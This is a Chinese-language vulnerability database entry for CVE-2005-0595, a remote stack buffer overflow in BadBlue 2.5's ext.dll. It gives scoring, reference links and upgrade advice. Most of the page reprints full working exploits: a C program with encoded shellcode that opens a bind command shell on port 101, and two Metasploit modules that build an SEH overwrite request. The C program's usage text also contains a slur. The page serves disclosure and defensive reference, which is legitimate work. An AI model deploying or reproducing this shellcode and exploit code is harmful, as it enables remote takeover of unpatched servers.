CVE-2005-0595
CVSS7.5
发布时间 :2005-05-02 00:00:00
修订时间 :2008-09-05 16:46:45
NMCOEP    

[原文]Buffer overflow in ext.dll in BadBlue 2.55 allows remote attackers execute arbitrary code via a long mfcisapicommand parameter.


[CNNVD]BadBlue ext.dll mfcisapicommand远程缓冲区溢出漏洞(CNNVD-200505-653)

        BadBlue是一款集合Web/P2P服务程序,支持CGI、ISAPI。自带的ISAPI模块提供HTML嵌入动态WEB页面语言。BadBlue处理特定类型的超长畸形请求时存在漏洞,远程攻击者可能利用此漏洞在服务器上以Web进程权限执行任意指令。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0595
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-0595
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200505-653
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/12673
(PATCH)  BID  12673
http://secunia.com/advisories/14405
(VENDOR_ADVISORY)  SECUNIA  14405
http://archives.neohapsis.com/archives/fulldisclosure/2005-02/0599.html
(PATCH)  FULLDISC  20050226 Badblue HTTP Server, ext.dll buffer overflow

- 漏洞信息

BadBlue ext.dll mfcisapicommand远程缓冲区溢出漏洞
高危 缓冲区溢出
2005-05-02 00:00:00 2006-08-23 00:00:00
远程  
        BadBlue是一款集合Web/P2P服务程序,支持CGI、ISAPI。自带的ISAPI模块提供HTML嵌入动态WEB页面语言。BadBlue处理特定类型的超长畸形请求时存在漏洞,远程攻击者可能利用此漏洞在服务器上以Web进程权限执行任意指令。

- 公告与补丁

        目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
        http://www.badblue.com/index.htm

- 漏洞信息 (845)

BadBlue 2.5 Easy File Sharing Remote Buffer Overflow (EDBID:845)
windows remote
2005-02-27 Verified
80 class101
[点击下载] [点击下载]
/*
BadBlue, Easy File Sharing Remote BOverflow

Homepage:         badblue.com
Affected version: v2.5 (2.60 and below not tested)
Patched  version: v2.61
Link:             badblue.com/bbs98.exe
Date:             27 February 2005

Application Risk: Severely High
Internet Risk:    Low

Dicovery Credits: Andres Tarasco (atarasco _at_ sia.es)
Exploit Credits : class101 & metasploit.com

Hole History:

 26-2-2005: BOF flaw published by Andres Tarasco of sia.es
 27-2-2002: Hat-Squad.com releases an exploit
 28-2-2005: haxorcitos releases a dupe with fake date :>
            or you sux doing private stuffs.

Notes:

 -6 bad chars, 0x00, 0x26, 0x20, 0x0A, 0x8C, 0x3C, badly interpreted by
BadBlue
 -using offsets from ext.dll, universal.
 -use findjmp2 to quick search into ext.dll to see
  if the offsets changes in the others BadBlue's versions below 2.5
 -if you need the v2.5 for exploitation's pratices, get it on class101.org
 -rename to .c for nux, haven't tested this one but it should works fine.

Greet:

 Nima Majidi
       Behrang Fouladi
 Pejman
 Hat-Squad.com
 metasploit.com
 A^C^E of addict3d.org
 str0ke of milw0rm.com
 and my homy class101.org :>
*/

#include <stdio.h>
#include <string.h>
#include <time.h>
#ifdef WIN32
#include "winsock2.h"
#pragma comment(lib, "ws2_32")
#else
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#endif

char scode[]=
/*XORed, I kiss metasploit.com because they are what means elite!*/
"\x29\xc9\x83\xe9\xaf\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e\x03"
"\x7b\x5b\x13\x83\xee\xfc\xe2\xf4\xff\x11\xb0\x5c\xeb\x82\xa4\xec"
"\xfc\x1b\xd0\x7f\x27\x5f\xd0\x56\x3f\xf0\x27\x16\x7b\x7a\xb4\x98"
"\x4c\x63\xd0\x4c\x23\x7a\xb0\xf0\x33\x32\xd0\x27\x88\x7a\xb5\x22"
"\xc3\xe2\xf7\x97\xc3\x0f\x5c\xd2\xc9\x76\x5a\xd1\xe8\x8f\x60\x47"
"\x27\x53\x2e\xf0\x88\x24\x7f\x12\xe8\x1d\xd0\x1f\x48\xf0\x04\x0f"
"\x02\x90\x58\x3f\x88\xf2\x37\x37\x1f\x1a\x98\x22\xc3\x1f\xd0\x53"
"\x33\xf0\x1b\x1f\x88\x0b\x47\xbe\x88\x3b\x53\x4d\x6b\xf5\x15\x1d"
"\xef\x2b\xa4\xc5\x32\xa0\x3d\x40\x65\x13\x68\x21\x6b\x0c\x28\x21"
"\x5c\x2f\xa4\xc3\x6b\xb0\xb6\xef\x38\x2b\xa4\xc5\x5c\xf2\xbe\x75"
"\x82\x96\x53\x11\x56\x11\x59\xec\xd3\x13\x82\x1a\xf6\xd6\x0c\xec"
"\xd5\x28\x08\x40\x50\x28\x18\x40\x40\x28\xa4\xc3\x65\x13\x5b\x76"
"\x65\x28\xd2\xf2\x96\x13\xff\x09\x73\xbc\x0c\xec\xd5\x11\x4b\x42"
"\x56\x84\x8b\x7b\xa7\xd6\x75\xfa\x54\x84\x8d\x40\x56\x84\x8b\x7b"
"\xe6\x32\xdd\x5a\x54\x84\x8d\x43\x57\x2f\x0e\xec\xd3\xe8\x33\xf4"
"\x7a\xbd\x22\x44\xfc\xad\x0e\xec\xd3\x1d\x31\x77\x65\x13\x38\x7e"
"\x8a\x9e\x31\x43\x5a\x52\x97\x9a\xe4\x11\x1f\x9a\xe1\x4a\x9b\xe0"
"\xa9\x85\x19\x3e\xfd\x39\x77\x80\x8e\x01\x63\xb8\xa8\xd0\x33\x61"
"\xfd\xc8\x4d\xec\x76\x3f\xa4\xc5\x58\x2c\x09\x42\x52\x2a\x31\x12"
"\x52\x2a\x0e\x42\xfc\xab\x33\xbe\xda\x7e\x95\x40\xfc\xad\x31\xec"
"\xfc\x4c\xa4\xc3\x88\x2c\xa7\x90\xc7\x1f\xa4\xc5\x51\x84\x8b\x7b"
"\xf3\xf1\x5f\x4c\x50\x84\x8d\xec\xd3\x7b\x5b\x13";

char payload[1024];

char ebx[]="\x05\x53\x02\x10";  /*call.ext.dll*/
char ebx2[]="\xB0\x55\x02\x10"; /*pop.pop.ret.ext.dll thx findjmp2 ;>*/
char pad[]="\xEB\x0C\x90\x90";
char pad2[]="\xE9\x05\xFE\xFF\xFF";
char EOL[]="\x0D\x0A\x0D\x0A";
char talk[]=
"\x47\x45\x54\x20\x2F\x65\x78\x74\x2E\x64\x6C\x6C\x3F\x6D\x66\x63"
"\x69\x73\x61\x70\x69\x63\x6F\x6D\x6D\x61\x6E\x64\x3D";

#ifdef WIN32
WSADATA wsadata;
#endif

void ver();
void usage(char* us);

int main(int argc,char *argv[])
{
ver();
unsigned long gip;
unsigned short gport;
char *target, *os;
if
(argc>6||argc<3||atoi(argv[1])>3||atoi(argv[1])<1){usage(argv[0]);return -1;
}
if (argc==5){usage(argv[0]);return -1;}
   if (strlen(argv[2])<7){usage(argv[0]);return -1;}
   if (argc==6)
{
       if (strlen(argv[4])<7){usage(argv[0]);return -1;}
}
#ifndef WIN32
if (argc==6)
{
  gip=inet_addr(argv[4])^(long)0x93939393;
 gport=htons(atoi(argv[5]))^(short)0x9393;
}
#define Sleep  sleep
#define SOCKET  int
#define closesocket(s) close(s)
#else
if (WSAStartup(MAKEWORD(2,0),&wsadata)!=0){printf("[+] wsastartup error\n");return -1;}
if (argc==6)
{
 gip=inet_addr(argv[4])^(ULONG)0x93939393;
 gport=htons(atoi(argv[5]))^(USHORT)0x9393;
}
#endif
int ip=htonl(inet_addr(argv[2])), port;
if (argc==4||argc==6){port=atoi(argv[3]);} else port=80;
SOCKET s;fd_set mask;struct timeval timeout; struct sockaddr_in server;
s=socket(AF_INET,SOCK_STREAM,0);
if (s==-1){printf("[+] socket() error\n");return -1;}
if (atoi(argv[1]) == 1){target=ebx;os="Win2k SP4 Server English\n[+] Win2k SP4 Pro.   English\n[+]            Win2k SP- -      -";}
if (atoi(argv[1]) == 2){target=ebx2;os="WinXP SP2  Pro. English\n[+] WinXP SP1a Pro. English\n[+]            WinXP SP-  -    -";}
if (atoi(argv[1]) == 3){target=ebx2;os="Win2003 SP4 Server English\n[+] Win2003 SP- -      -";}
printf("[+] target(s): %s\n",os);
server.sin_family=AF_INET;
server.sin_addr.s_addr=htonl(ip);
server.sin_port=htons(port);
if (argc==6){printf("[+] reverse mode disabled for this exploit\n");
printf("[+] get the source at class101.org and update yourself!\n");return -1;}
connect(s,( struct sockaddr *)&server,sizeof(server));
timeout.tv_sec=3;timeout.tv_usec=0;FD_ZERO(&mask);FD_SET(s,&mask);
switch(select(s+1,NULL,&mask,NULL,&timeout))
{
 case -1: {printf("[+] select() error\n");closesocket(s);return -1;}
 case 0: {printf("[+] connect() error\n");closesocket(s);return -1;}
 default:
 if(FD_ISSET(s,&mask))
 {
  printf("[+] connected, constructing the payload...\n");
#ifdef WIN32
  Sleep(1000);
#else
  Sleep(1);
#endif
  strcpy(payload,talk);
  memset(payload+29,0x90,520);
  if (atoi(argv[1]) == 1||atoi(argv[1]) == 2)
  {
   memcpy(payload+29+492,&pad,4);
   memcpy(payload+521+4,target,4);
   memcpy(payload+536+1,pad2,5);
  }
  else
  {
   memcpy(payload+29+485,&pad,4);
   memcpy(payload+514+4,target,4);
   memcpy(payload+529+1,pad2,5);
  }
  strcat(payload,EOL);
  memcpy(payload+36+3,scode,strlen(scode));
  if (send(s,payload,strlen(payload),0)==-1) { printf("[+] sending error 1, the server prolly rebooted.\n");return -1;}
#ifdef WIN32
  Sleep(2000);
#else
  Sleep(2);
#endif

  printf("[+] size of payload: %d\n",strlen(payload));
  printf("[+] payload sent.\n");
  return 0;
 }
}
closesocket(s);
#ifdef WIN32
WSACleanup();
#endif
return 0;
}

void usage(char* us)
{
printf("USAGE:\n");
printf("      [+]  . 101_bblu.exe Target VulnIP (bind mode)\n");
printf("      [+]  . 101_bblu.exe Target VulnIP VulnPORT (bind mode)\n");
printf("      [+]  . 101_bblu.exe Target VulnIP VulnPORT GayIP GayPORT (reverse mode)\n");
printf("TARGET:                               \n");
printf("      [+] 1. Win2k  SP4  Server English (*)\n");
printf("      [+] 1. Win2k  SP4  Pro    English (*)\n");
printf("      [+] 1. Win2k  SP-  -      -          \n");
printf("      [+] 2. WinXP  SP2  Pro.   English    \n");
printf("      [+] 2. WinXP  SP1a Pro.   English (*)\n");
printf("      [+] 2. WinXP  SP-  -      -          \n");
printf("      [+] 3. Win2k3 SP0  Server Italian (*)\n");
printf("      [+] 3. Win2k3 SP-  -      -          \n");
printf("NOTE:                                      \n");
printf("      The exploit bind a cmdshell port 101 or\n");
printf("      reverse a cmdshell on your listener.\n");
printf("      A wildcard (*) mean tested working, else, supposed working.\n");
printf("      A symbol   (-) mean all.\n");
printf("      Compilation msvc6, cygwin, Linux.\n");
return;
}
void ver()
{
printf(" \n");
printf(" ===================================================[0.1]=====\n");
printf("        ================BadBlue, Easy File Sharing 2.5===============\n");
printf("        ================ext.dll, Remote Stack Overflow===============\n");
printf("        ======coded by class101==================[Hat-Squad.com]=====\n");
printf("        =====================================[class101.org 2005]=====\n");
printf(" \n");
}

// milw0rm.com [2005-02-27]
		

- 漏洞信息 (16761)

BadBlue 2.5 EXT.dll Buffer Overflow (EDBID:16761)
windows remote
2010-07-07 Verified
80 metasploit
[点击下载] [点击下载]
##
# $Id: badblue_ext_overflow.rb 9719 2010-07-07 17:38:59Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GreatRanking

	# NOTE: BadBlue doesn't give any HTTP headers when requesting '/'.
	# However, a proper Server header is returned when requesting /index.html or using HEAD.
	HttpFingerprint = { :method => 'HEAD', :pattern => [ /BadBlue\// ] }

	include Msf::Exploit::Remote::HttpClient
	include Msf::Exploit::Remote::Seh

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'BadBlue 2.5 EXT.dll Buffer Overflow',
			'Description'    => %q{
				This is a stack buffer overflow exploit for BadBlue version 2.5.
			},
			'Author'         => 'acaro <acaro [at] jervus.it>',
			'License'        => BSD_LICENSE,
			'Version'        => '$Revision: 9719 $',
			'References'     =>
				[
					[ 'CVE', '2005-0595' ],
					[ 'OSVDB', '14238' ],
					[ 'BID', '7387' ],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'process',
				},
			'Privileged'     => true,
			'Payload'        =>
				{
					'Space'    => 500,
					'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					['BadBlue 2.5 (Universal)', { 'Ret' => 0x1003d9da }],
				],
			'DisclosureDate' => 'Apr 20 2003',
			'DefaultTarget'  => 0))
	end

	def check
		info = http_fingerprint  # check method
		if (info =~ /BadBlue\/2\.5/)
			return Exploit::CheckCode::Vulnerable
		end
		Exploit::CheckCode::Safe
	end

	def exploit
		uri     = "GET /ext.dll?mfcisapicommand="
		sploit  = rand_text_alphanumeric(500)
		seh     = generate_seh_payload(target.ret)
		sploit[492, seh.length] = seh
		uri << sploit

		print_status("Trying target #{target.name}...")
		send_request_raw({ 'uri' => uri })

		handler
	end

end
		

- 漏洞信息 (F83022)

BadBlue 2.5 EXT.dll Buffer Overflow (PacketStormID:F83022)
2009-11-26 00:00:00
acaro  metasploit.com
exploit,overflow
CVE-2005-0595
[点击下载]

This is a stack overflow exploit for BadBlue version 2.5.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::Tcp
	include Msf::Exploit::Remote::Seh

	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'BadBlue 2.5 EXT.dll Buffer Overflow',
			'Description'    => %q{
				This is a stack overflow exploit for BadBlue version 2.5.
			},
			'Author'         => 'acaro <acaro [at] jervus.it>',
			'License'        => BSD_LICENSE,
			'Version'        => '$Revision$',
			'References'     =>
				[
					[ 'CVE', '2005-0595' ],
					[ 'OSVDB', '14238' ],
					[ 'BID', '7387' ],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'process',
				},
			'Privileged'     => true,
			'Payload'        =>
				{
					'Space'    => 500,
					'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			'Targets'        => 
				[
					['BadBlue 2.5 (Universal)', { 'Ret' => 0x1003d9da }], 
				],
			'DisclosureDate' => 'Apr 20 2003',
			'DefaultTarget'  => 0))
			
			register_options( [ Opt::RPORT(80) ], self.class )
	end

	def check
		connect
 
		sock.put("GET / HTTP/1.0\r\n\r\n")
		resp = sock.get_once
		disconnect
 
			if (resp =~ /BadBlue\/2.5/)
				return Exploit::CheckCode::Vulnerable
			end 
				return Exploit::CheckCode::Safe
	end

	def exploit
		connect

		uri     = "GET /ext.dll?mfcisapicommand=" 
		sploit  = rand_text_alphanumeric(500) 
		seh     = generate_seh_payload(target.ret)
		sploit[492, seh.length] = seh

		print_status("Trying target #{target.name}...")

		sock.put(uri + sploit + "\r\n\r\n")
		
		handler
		disconnect
	end

end
    

- 漏洞信息

14238
BadBlue ext.dll mfcisapicommand Parameter Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity Upgrade
Exploit Public Vendor Verified

- 漏洞描述

A REMOTE overflow exists in BadBlue http Server. The BadBlue http Server fails to validate the mfcisapicommand parameter resulting in a buffer overflow. With a specially crafted request, an attacker can cause the execution of arbitrary code resulting in a loss of integrity.

- 时间线

2005-02-25 2004-12-01
2005-02-26 2007-03-26

- 解决方案

Upgrade to version 2.60 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站